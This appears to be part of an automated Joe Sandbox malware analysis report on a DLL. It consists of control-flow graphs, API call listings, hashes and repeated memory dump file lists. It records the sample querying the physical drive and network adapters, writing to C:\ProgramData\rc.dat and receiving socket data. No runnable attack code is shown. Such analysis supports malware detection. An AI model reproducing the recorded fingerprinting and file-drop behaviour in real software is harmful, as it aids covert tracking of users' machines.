                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                              • String ID: GetAdaptersInfo$iphlpapi.dll
                              • API String ID: 514930453-3114217049
                              • Opcode ID: c76babb7bc64f53f9a3deb8ace7e54a41d89bba2ed4c9622dd5f386f76540279
                              • Instruction ID: 8c5940d6773624d00b92e4cbaf3fc63739c863f0ff9afd805ba81f513d453824
                              • Opcode Fuzzy Hash: c76babb7bc64f53f9a3deb8ace7e54a41d89bba2ed4c9622dd5f386f76540279
                              • Instruction Fuzzy Hash: 7E21DB32B042099FDB11DBA9CA446EEBBF8EF09318F34056BD564E7B01D7309A45C7A2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 605 6cec8003-6cec802e CreateFileA 606 6cec80ff-6cec8106 605->606 607 6cec8034-6cec8049 605->607 608 6cec804c-6cec806e DeviceIoControl 607->608 609 6cec80a7-6cec80af 608->609 610 6cec8070-6cec8078 608->610 611 6cec80b8-6cec80ba 609->611 612 6cec80b1-6cec80b7 call 6cecbefb 609->612 613 6cec807a-6cec807f 610->613 614 6cec8081-6cec8086 610->614 616 6cec80bc-6cec80bf 611->616 617 6cec80f5-6cec80fe CloseHandle 611->617 612->611 613->609 614->609 618 6cec8088-6cec8090 614->618 620 6cec80db-6cec80e8 call 6cecc29f 616->620 621 6cec80c1-6cec80ca GetLastError 616->621 617->606 622 6cec8093-6cec8098 618->622 620->617 630 6cec80ea-6cec80f0 620->630 621->617 623 6cec80cc-6cec80cf 621->623 622->622 625 6cec809a-6cec80a6 call 6cec7ddb 622->625 623->620 627 6cec80d1-6cec80d8 623->627 625->609 627->620 630->608
                              APIs
                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 6CEC8022
                              • DeviceIoControl.KERNELBASE(00000000,002D1400,98BADCFE,0000000C,?,00000400,?,00000000), ref: 6CEC8060
                              • GetLastError.KERNEL32 ref: 6CEC80C1
                              • CloseHandle.KERNELBASE(?), ref: 6CEC80F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                              • String ID: \\.\PhysicalDrive0
                              • API String ID: 4026078076-1180397377
                              • Opcode ID: cab2535cf603314049a3d0a595184cbd755285a3e8136dca01a87d00a36312a5
                              • Instruction ID: d9ad6e5b6acf93b654008e1f38fb30647e243817c9437267d415ea5a92bae1e4
                              • Opcode Fuzzy Hash: cab2535cf603314049a3d0a595184cbd755285a3e8136dca01a87d00a36312a5
                              • Instruction Fuzzy Hash: 2D31A671F00215ABEB24CF95CA55AEF7B78EF05758F30416EE524A3A80D7705A05CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 690 6ceb3edf-6ceb3ef6 InterlockedIncrement 691 6ceb3ef8-6ceb3efc 690->691 692 6ceb3efe-6ceb3f06 690->692 693 6ceb3f67-6ceb3f72 call 6ceb2858 691->693 694 6ceb3f08-6ceb3f0f 692->694 695 6ceb3f11-6ceb3f41 WSARecv WSAGetLastError 692->695 703 6ceb3f7f-6ceb3f81 693->703 694->693 696 6ceb3f4a-6ceb3f54 695->696 697 6ceb3f43-6ceb3f48 695->697 699 6ceb3f57-6ceb3f5a 696->699 697->699 701 6ceb3f5c-6ceb3f61 699->701 702 6ceb3f74-6ceb3f7a call 6ceb27dd 699->702 701->702 705 6ceb3f63-6ceb3f66 701->705 702->703 705->693
                              APIs
                              • InterlockedIncrement.KERNEL32(-00000015), ref: 6CEB3EEC
                                • Part of subcall function 6CEB27DD: __EH_prolog.LIBCMT ref: 6CEB27E2
                                • Part of subcall function 6CEB27DD: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB27F8
                                • Part of subcall function 6CEB27DD: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,?,6CEB3F7F,?,?,?,?,?,Xll,00000000), ref: 6CEB280B
                                • Part of subcall function 6CEB27DD: InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2834
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked$Exchange$CompareCompletionH_prologIncrementPostQueuedStatus
                              • String ID: Xll
                              • API String ID: 2993877247-1487709360
                              • Opcode ID: 018877f99b6ff207e2bd73ee039ce0be430eba1488e3a4a3f69db7cbfcc375f0
                              • Instruction ID: 141ab654500f71295b48e5b0b34873a10d129229b357f922dbf9093ecdbcdfb1
                              • Opcode Fuzzy Hash: 018877f99b6ff207e2bd73ee039ce0be430eba1488e3a4a3f69db7cbfcc375f0
                              • Instruction Fuzzy Hash: 5E11E275204208ABDF108E18CD87FEA3B75EF05358F30411AFA15E7A90CB34D865CB90

                              Control-flow Graph

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6CEB2090
                              • GetLastError.KERNEL32 ref: 6CEB20A2
                                • Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6CEB20D4
                              • GetLastError.KERNEL32 ref: 6CEB20E6
                              • __beginthreadex.LIBCMT ref: 6CEB2126
                              • GetLastError.KERNEL32 ref: 6CEB213B
                              • CloseHandle.KERNEL32(00000000), ref: 6CEB2151
                              • CloseHandle.KERNEL32(00000000), ref: 6CEB215F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CEB2183
                              • CloseHandle.KERNELBASE(00000000), ref: 6CEB218A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                              • String ID: thread$thread.entry_event$thread.exit_event
                              • API String ID: 831262434-3017686385
                              • Opcode ID: 129785652a41dbfb1b9b4af8961801ec61de7cd2a0f60f9920b189578c500f07
                              • Instruction ID: fb9f94d31926fe6a302acee89b5b4f5d6c96f7fa5eff18032ff7a3213cf1f86a
                              • Opcode Fuzzy Hash: 129785652a41dbfb1b9b4af8961801ec61de7cd2a0f60f9920b189578c500f07
                              • Instruction Fuzzy Hash: 89319171A00218EFDB00DFA0C848BAEBB75FF49355F208569E915AB750DB709D04DB90

                              Control-flow Graph

                              APIs
                              • _malloc.LIBCMT ref: 6CEB66C4
                                • Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
                                • Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
                                • Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F
                              • SHGetSpecialFolderPathW.SHELL32(00000000,6CEB6BCB,00000023,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66F1
                              • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,6CEB6BCB,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66FF
                              • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB670F
                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB6729
                              • ReadFile.KERNELBASE(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6747
                              • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6750
                                • Part of subcall function 6CEB60CA: _malloc.LIBCMT ref: 6CEB60DE
                              • CreateFileW.KERNEL32(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6793
                              • WriteFile.KERNEL32(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67B1
                              • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandle_malloc$AllocateFolderHeapPathReadSpecialWritelstrcatlstrcpy
                              • String ID: C:\ProgramData\rc.dat$\ts.dat
                              • API String ID: 1057352565-2903805982
                              • Opcode ID: 4adc0f3cfcb2830a0d6451e26e18dcc1088164090e6f8ae233bb9b74a53caac4
                              • Instruction ID: af5dd343d015a0c7422a22f1556dee246082e92f920b1c5d322c44fe6179ff4a
                              • Opcode Fuzzy Hash: 4adc0f3cfcb2830a0d6451e26e18dcc1088164090e6f8ae233bb9b74a53caac4
                              • Instruction Fuzzy Hash: B9317E72680208BFEB54EBE08D4AFAD7B78EB09704F204569F611FA1D0DB715A059B51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 426 6ceb57b7-6ceb57ed call 6cedd8f0 call 6cec9270 EnterCriticalSection 431 6ceb5a92-6ceb5aa1 LeaveCriticalSection 426->431 432 6ceb57f2-6ceb5816 call 6ceb9cec call 6ceb561b 431->432 433 6ceb5aa7-6ceb5ac3 call 6ceb4b80 431->433 440 6ceb5a79-6ceb5a85 EnterCriticalSection LeaveCriticalSection 432->440 441 6ceb581c-6ceb5821 432->441 444 6ceb5a8b-6ceb5a90 EnterCriticalSection 440->444 442 6ceb5a41-6ceb5a43 441->442 443 6ceb5827-6ceb5845 call 6ceb8b6f call 6cebf277 441->443 442->440 446 6ceb5a45-6ceb5a77 call 6ceb2f43 call 6ceb8b6f call 6cebf07c call 6ceb1962 442->446 451 6ceb584a-6ceb5851 443->451 444->431 446->440 446->444 451->440 453 6ceb5857-6ceb5870 call 6ceb88aa 451->453 460 6ceb58d2-6ceb58d6 453->460 461 6ceb5872-6ceb589c call 6ceb8b6f call 6cebf277 453->461 463 6ceb58d8-6ceb5902 call 6ceb8b6f call 6cebf277 460->463 464 6ceb58a2-6ceb58ae EnterCriticalSection LeaveCriticalSection 460->464 461->464 475 6ceb5979-6ceb59a7 call 6ceb2f43 call 6ceb8b6f call 6cebf277 call 6ceb1962 461->475 463->464 478 6ceb5904-6ceb5936 call 6cebf29b call 6ceb8b6f call 6cebf277 463->478 466 6ceb58b4-6ceb58bb EnterCriticalSection LeaveCriticalSection 464->466 469 6ceb58c1-6ceb58cd call 6ceb8992 466->469 469->444 495 6ceb59ad-6ceb59db call 6ceb2f43 call 6ceb8b6f call 6cebf277 call 6ceb1962 475->495 496 6ceb5a37-6ceb5a3c 475->496 478->464 492 6ceb593c-6ceb5974 call 6ceb9961 * 2 call 6cebf2d7 call 6ceb88e9 call 6ceb8992 478->492 492->475 495->496 513 6ceb59dd-6ceb5a32 call 6ceb8845 call 6cebf320 call 6cebf441 call 6ceb5ac4 call 6ceb4d08 495->513 496->466 513->469
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB57BC
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB57E8
                              • EnterCriticalSection.KERNEL32(6CEF13B8,6CEE5EEF), ref: 6CEB58A8
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58AE
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58B5
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58BB
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB5A90
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB5A99
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
